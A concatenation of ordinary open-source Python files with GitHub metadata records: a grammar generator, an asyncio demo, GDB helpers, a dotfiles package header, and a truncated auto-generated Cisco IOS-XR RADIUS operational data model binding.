grammar_folder_path = os.path.dirname(__file__) + "/" + GRAMMAR_FOLDER_NAME
if not os.path.isdir(grammar_folder_path):
os.mkdir(grammar_folder_path)
grammar_file_path = grammar_folder_path + "/" + GRAMMAR_FILE_NAME
with open(grammar_file_path, "w+") as grammar_file:
grammar_file.write("# AUTOMATICALLY GENERATED\n")
grammar_file.write("from arpeggio import Optional, ZeroOrMore, OneOrMore, EOF, ParserPython, NoMatch, RegExMatch\n\n")
for rulename, details in data['structure'].items():
rule = grammarRuleFactory.get_or_create_rule(rulename, details, keywords)
if details['isPrimary']:
GrammarState.primary_key = rulename
grammar_file.write(rule.text)
grammar_file.write('\n\n')
GrammarState.gen_module = importlib.import_module(GRAMMAR_FOLDER_NAME)
importlib.reload(GrammarState.gen_module)
def get_grammar_root():
res = requests.get(GRAMMAR_URL)
_generate_file_from_data(res.json())
return GrammarState.gen_module.root
| {
"content_hash": "9d760e67f29befef4d3d24a54974759a",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 126,
"avg_line_length": 31.896551724137932,
"alnum_prop": 0.6040540540540541,
"repo_name": "Zubdano/zql",
"id": "a8ee5d32c2c70e06fe3de0c42022348f4c5af8c0",
"size": "3700",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zql-backend/interpreter/generate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11853"
},
{
"name": "HTML",
"bytes": "587"
},
{
"name": "JavaScript",
"bytes": "50515"
},
{
"name": "Python",
"bytes": "52350"
},
{
"name": "Shell",
"bytes": "1051"
}
],
"symlink_target": ""
} |
"""
Demonstration of the asyncio module in Python 3.5
This simulation is composed of three layers, each of which will split up the
data into some different subsets, pass the subsets off to the next layer, wait
for results, and then do some non-trivial processing to return to the previous
layer (in this case, sleeping for a few seconds). The expensive operations are
offloaded to a ThreadPoolExecutor, which maintains a pool of processing
threads, allowing for the utilization of multiple cores (hypothetically).
"""
import asyncio
import logging
import time
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(format="[%(thread)-5d]%(asctime)s: %(message)s")
logger = logging.getLogger('async')
logger.setLevel(logging.INFO)
executor = ThreadPoolExecutor(max_workers=10)
loop = asyncio.get_event_loop()
def cpu_bound_op(exec_time, *data):
"""
Simulation of a long-running CPU-bound operation
:param exec_time: how long this operation will take
:param data: data to "process" (sum it up)
:return: the processed result
"""
logger.info("Running cpu-bound op on {} for {} seconds".format(data, exec_time))
time.sleep(exec_time)
return sum(data)
async def process_pipeline(data):
# just pass the data along to level_a and return the results
results = await level_a(data)
return results
async def level_a(data):
# tweak the data a few different ways and pass them each to level b.
level_b_inputs = data, 2*data, 3*data
results = await asyncio.gather(*[level_b(val) for val in level_b_inputs])
# we've now effectively called level_b(...) three times with three inputs,
# and (once the await returns) they've all finished, so now we'll take
# the results and pass them along to our own long-running CPU-bound
# process via the thread pool.
# Note the signature of run_in_executor: (executor, func, *args)
# The third argument and beyond will be passed to cpu_bound_op when it is called.
result = await loop.run_in_executor(executor, cpu_bound_op, 3, *results)
# level a processing is now done, pass back the results
return result
async def level_b(data):
# similar to level a
level_c_inputs = data/2, data/4, data/7
results = await asyncio.gather(*[level_c(val) for val in level_c_inputs])
result = await loop.run_in_executor(executor, cpu_bound_op, 2, *results)
return result
async def level_c(data):
# final level - queue up the long-running CPU-bound process in the
# thread pool immediately
result = await loop.run_in_executor(executor, cpu_bound_op, 1, data)
return result
def main():
start_time = time.time()
result = loop.run_until_complete(process_pipeline(2.5))
logger.info("Completed ({}) in {} seconds".format(result, time.time() - start_time))
if __name__ == '__main__':
main()
| {
"content_hash": "3506e5f89d26e4adaffc7b3618f52b36",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 88,
"avg_line_length": 39.72222222222222,
"alnum_prop": 0.7115384615384616,
"repo_name": "dmeklund/asyncdemo",
"id": "6831711c626bab222298b8b4c9f5c2d8b098409b",
"size": "2860",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "asynctest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7494"
}
],
"symlink_target": ""
} |
def foo():
return
| {
"content_hash": "654ff048c99c42003de447473d81bee5",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 10,
"avg_line_length": 11,
"alnum_prop": 0.5454545454545454,
"repo_name": "doboy/Underscore",
"id": "a4a7def833c4da7503c1f61d81ec3c632f21efe1",
"size": "22",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/empty_return_statement.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "410"
},
{
"name": "Python",
"bytes": "49556"
}
],
"symlink_target": ""
} |
try:
import gdb
except ImportError as e:
raise ImportError("This script must be run in GDB: ", str(e))
import sys
import os
sys.path.append(os.getcwd())
import stl_containers
import simple_class_obj
SIZE_OF_INT = 4
SIZE_OF_BOOL = 1
SIZE_OF_INT64 = 8
SIZE_OF_UINT256 = 32
def get_special_type_obj(gobj):
obj_type = gobj.type.strip_typedefs()
if stl_containers.VectorObj.is_this_type(obj_type):
return stl_containers.VectorObj(gobj)
if stl_containers.ListObj.is_this_type(obj_type):
return stl_containers.ListObj(gobj)
if stl_containers.PairObj.is_this_type(obj_type):
return stl_containers.PairObj(gobj)
if stl_containers.MapObj.is_this_type(obj_type):
return stl_containers.MapObj(gobj)
if stl_containers.SetObj.is_this_type(obj_type):
return stl_containers.SetObj(gobj)
if simple_class_obj.SimpleClassObj.is_this_type(obj_type):
return simple_class_obj.SimpleClassObj(gobj)
return False
def is_special_type(obj_type):
if stl_containers.VectorObj.is_this_type(obj_type):
return True
if stl_containers.ListObj.is_this_type(obj_type):
return True
if stl_containers.PairObj.is_this_type(obj_type):
return True
if stl_containers.MapObj.is_this_type(obj_type):
return True
if stl_containers.SetObj.is_this_type(obj_type):
return True
if simple_class_obj.SimpleClassObj.is_this_type(obj_type):
return True
return False
def get_instance_size(gobj):
obj = get_special_type_obj(gobj)
if not obj:
return gobj.type.sizeof
return obj.get_used_size()
| {
"content_hash": "bbbce8e580b2f007b754fe90c47f2cbf",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 65,
"avg_line_length": 30.166666666666668,
"alnum_prop": 0.6899938612645795,
"repo_name": "ivansib/sibcoin",
"id": "7dcc6c021db60e95e5f0b8416a21ad3958676f90",
"size": "1650",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/auto_gdb/common_helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "4039577"
},
{
"name": "C++",
"bytes": "6212205"
},
{
"name": "CMake",
"bytes": "1881"
},
{
"name": "CSS",
"bytes": "255014"
},
{
"name": "Dockerfile",
"bytes": "237"
},
{
"name": "HTML",
"bytes": "137533"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "190865"
},
{
"name": "Makefile",
"bytes": "112613"
},
{
"name": "Objective-C",
"bytes": "3798"
},
{
"name": "Objective-C++",
"bytes": "7230"
},
{
"name": "Python",
"bytes": "1028306"
},
{
"name": "QMake",
"bytes": "960"
},
{
"name": "Shell",
"bytes": "49937"
}
],
"symlink_target": ""
} |
"""
dotfiles
~~~~~~~~
Dotfiles is a tool to make managing your dotfile symlinks in $HOME easy,
allowing you to keep all your dotfiles in a single directory. Hosting is
up to you. You can use a VCS like git, Dropbox, or even rsync to distribute
your dotfiles repository across multiple hosts.
:copyright: (c) 2011-2014 by Jon Bernard.
:license: ISC, see LICENSE.rst for more details.
"""
__version__ = '0.6.4'
| {
"content_hash": "1f71d3ed003867d76c7df00e08e1aafa",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 79,
"avg_line_length": 31.785714285714285,
"alnum_prop": 0.6741573033707865,
"repo_name": "jawilson/dotfiles",
"id": "226c06e2586bf2f5ec1e16f28f1c84cfb7561c91",
"size": "445",
"binary": false,
"copies": "5",
"ref": "refs/heads/main",
"path": "tools/dotfiles/dotfiles/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "3729"
},
{
"name": "Erlang",
"bytes": "3232"
},
{
"name": "JavaScript",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "686"
},
{
"name": "Python",
"bytes": "417032"
},
{
"name": "Ruby",
"bytes": "26905"
},
{
"name": "Shell",
"bytes": "538313"
},
{
"name": "Vim script",
"bytes": "1796488"
}
],
"symlink_target": ""
} |
""" Cisco_IOS_XR_aaa_protocol_radius_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-protocol\-radius package operational data.
This module contains definitions
for the following management objects\:
radius\: RADIUS operational data
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-locald\-oper
module with state data.
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Radius(object):
"""
RADIUS operational data
.. attribute:: nodes
Contains all the nodes
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.nodes = Radius.Nodes()
self.nodes.parent = self
class Nodes(object):
"""
Contains all the nodes
.. attribute:: node
RADIUS operational data for a particular node
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.node = YList()
self.node.parent = self
self.node.name = 'node'
class Node(object):
"""
RADIUS operational data for a particular node
.. attribute:: node_name <key>
Node name
**type**\: str
**pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)
.. attribute:: accounting
RADIUS accounting data
**type**\: :py:class:`Accounting <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting>`
.. attribute:: authentication
RADIUS authentication data
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication>`
.. attribute:: client
RADIUS client data
**type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Client>`
.. attribute:: dead_criteria
RADIUS dead criteria information
**type**\: :py:class:`DeadCriteria <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria>`
.. attribute:: dynamic_authorization
Dynamic authorization data
**type**\: :py:class:`DynamicAuthorization <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DynamicAuthorization>`
.. attribute:: server_groups
RADIUS server group table
**type**\: :py:class:`ServerGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.node_name = None
self.accounting = Radius.Nodes.Node.Accounting()
self.accounting.parent = self
self.authentication = Radius.Nodes.Node.Authentication()
self.authentication.parent = self
self.client = Radius.Nodes.Node.Client()
self.client.parent = self
self.dead_criteria = Radius.Nodes.Node.DeadCriteria()
self.dead_criteria.parent = self
self.dynamic_authorization = Radius.Nodes.Node.DynamicAuthorization()
self.dynamic_authorization.parent = self
self.server_groups = Radius.Nodes.Node.ServerGroups()
self.server_groups.parent = self
class Client(object):
"""
RADIUS client data
.. attribute:: authentication_nas_id
NAS\-Identifier of the RADIUS authentication client
**type**\: str
.. attribute:: unknown_accounting_responses
Number of RADIUS accounting responses packets received from unknown addresses
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_authentication_responses
Number of RADIUS access responses packets received from unknown addresses
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication_nas_id = None
self.unknown_accounting_responses = None
self.unknown_authentication_responses = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:client'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication_nas_id is not None:
return True
if self.unknown_accounting_responses is not None:
return True
if self.unknown_authentication_responses is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Client']['meta_info']
class DeadCriteria(object):
"""
RADIUS dead criteria information
.. attribute:: hosts
RADIUS server dead criteria host table
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.hosts = Radius.Nodes.Node.DeadCriteria.Hosts()
self.hosts.parent = self
class Hosts(object):
"""
RADIUS server dead criteria host table
.. attribute:: host
RADIUS Server
**type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.host = YList()
self.host.parent = self
self.host.name = 'host'
class Host(object):
"""
RADIUS Server
.. attribute:: acct_port_number
Accounting Port number (standard port 1646)
**type**\: int
**range:** 1..65535
.. attribute:: auth_port_number
Authentication Port number (standard port 1645)
**type**\: int
**range:** 1..65535
.. attribute:: ip_address
IP address of RADIUS server
**type**\: one of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
----
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
----
.. attribute:: time
Time in seconds
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time>`
.. attribute:: tries
Number of tries
**type**\: :py:class:`Tries <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_port_number = None
self.auth_port_number = None
self.ip_address = None
self.time = Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time()
self.time.parent = self
self.tries = Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries()
self.tries.parent = self
class Time(object):
"""
Time in seconds
.. attribute:: is_computed
True if computed; false if not
**type**\: bool
.. attribute:: value
Value for time or tries
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.is_computed = None
self.value = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:time'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.is_computed is not None:
return True
if self.value is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time']['meta_info']
class Tries(object):
"""
Number of tries
.. attribute:: is_computed
True if computed; false if not
**type**\: bool
.. attribute:: value
Value for time or tries
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.is_computed = None
self.value = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:tries'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.is_computed is not None:
return True
if self.value is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:host'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_port_number is not None:
return True
if self.auth_port_number is not None:
return True
if self.ip_address is not None:
return True
if self.time is not None and self.time._has_data():
return True
if self.tries is not None and self.tries._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:hosts'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.host is not None:
for child_ref in self.host:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:dead-criteria'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.hosts is not None and self.hosts._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria']['meta_info']
class Authentication(object):
"""
RADIUS authentication data
.. attribute:: authentication_group
List of authentication groups
**type**\: list of :py:class:`AuthenticationGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication.AuthenticationGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication_group = YList()
self.authentication_group.parent = self
self.authentication_group.name = 'authentication_group'
class AuthenticationGroup(object):
"""
List of authentication groups
.. attribute:: authentication
Authentication data
**type**\: :py:class:`Authentication_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: port
Authentication port number
**type**\: int
**range:** 0..4294967295
.. attribute:: server_address
IP address of RADIUS server
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication = Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_()
self.authentication.parent = self
self.family = None
self.ip_address = None
self.port = None
self.server_address = None
class Authentication_(object):
"""
Authentication data
.. attribute:: access_accepts
Number of access accepts
**type**\: int
**range:** 0..4294967295
.. attribute:: access_challenges
Number of access challenges
**type**\: int
**range:** 0..4294967295
.. attribute:: access_rejects
Number of access rejects
**type**\: int
**range:** 0..4294967295
.. attribute:: access_request_retransmits
Number of retransmitted access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_incorrect_responses
Number of incorrect authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_server_error_responses
Number of server error authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_unexpected_responses
Number of unexpected authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_authenticators
Number of bad access authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_responses
Number of bad access responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_access_responses
Number of access responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_access_requests
Number of pending access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for authentication in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: unknown_access_types
Number of packets received with unknown type from authentication server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.access_accepts = None
self.access_challenges = None
self.access_rejects = None
self.access_request_retransmits = None
self.access_requests = None
self.access_timeouts = None
self.authen_incorrect_responses = None
self.authen_response_time = None
self.authen_server_error_responses = None
self.authen_transaction_failure = None
self.authen_transaction_successess = None
self.authen_unexpected_responses = None
self.bad_access_authenticators = None
self.bad_access_responses = None
self.dropped_access_responses = None
self.pending_access_requests = None
self.rtt = None
self.unknown_access_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.access_accepts is not None:
return True
if self.access_challenges is not None:
return True
if self.access_rejects is not None:
return True
if self.access_request_retransmits is not None:
return True
if self.access_requests is not None:
return True
if self.access_timeouts is not None:
return True
if self.authen_incorrect_responses is not None:
return True
if self.authen_response_time is not None:
return True
if self.authen_server_error_responses is not None:
return True
if self.authen_transaction_failure is not None:
return True
if self.authen_transaction_successess is not None:
return True
if self.authen_unexpected_responses is not None:
return True
if self.bad_access_authenticators is not None:
return True
if self.bad_access_responses is not None:
return True
if self.dropped_access_responses is not None:
return True
if self.pending_access_requests is not None:
return True
if self.rtt is not None:
return True
if self.unknown_access_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication-group'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication is not None and self.authentication._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.port is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication.AuthenticationGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication_group is not None:
for child_ref in self.authentication_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication']['meta_info']
class Accounting(object):
"""
RADIUS accounting data
.. attribute:: accounting_group
List of accounting groups
**type**\: list of :py:class:`AccountingGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting.AccountingGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting_group = YList()
self.accounting_group.parent = self
self.accounting_group.name = 'accounting_group'
class AccountingGroup(object):
"""
List of accounting groups
.. attribute:: accounting
Accounting data
**type**\: :py:class:`Accounting_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: port
Accounting port number
**type**\: int
**range:** 0..4294967295
.. attribute:: server_address
IP address of RADIUS server
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting = Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_()
self.accounting.parent = self
self.family = None
self.ip_address = None
self.port = None
self.server_address = None
class Accounting_(object):
"""
Accounting data
.. attribute:: acct_incorrect_responses
Number of incorrect accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_server_error_responses
Number of server error accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_unexpected_responses
Number of unexpected accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_authenticators
Number of bad accounting authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_responses
Number of bad accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_responses
Number of accounting responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_requests
Number of pending accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: requests
Number of accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: responses
Number of accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: retransmits
Number of retransmitted accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for accounting in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: timeouts
Number of accounting packets timed\-out
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_packet_types
Number of packets received with unknown type from accounting server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_incorrect_responses = None
self.acct_response_time = None
self.acct_server_error_responses = None
self.acct_transaction_failure = None
self.acct_transaction_successess = None
self.acct_unexpected_responses = None
self.bad_authenticators = None
self.bad_responses = None
self.dropped_responses = None
self.pending_requests = None
self.requests = None
self.responses = None
self.retransmits = None
self.rtt = None
self.timeouts = None
self.unknown_packet_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_incorrect_responses is not None:
return True
if self.acct_response_time is not None:
return True
if self.acct_server_error_responses is not None:
return True
if self.acct_transaction_failure is not None:
return True
if self.acct_transaction_successess is not None:
return True
if self.acct_unexpected_responses is not None:
return True
if self.bad_authenticators is not None:
return True
if self.bad_responses is not None:
return True
if self.dropped_responses is not None:
return True
if self.pending_requests is not None:
return True
if self.requests is not None:
return True
if self.responses is not None:
return True
if self.retransmits is not None:
return True
if self.rtt is not None:
return True
if self.timeouts is not None:
return True
if self.unknown_packet_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting-group'
def is_config(self):
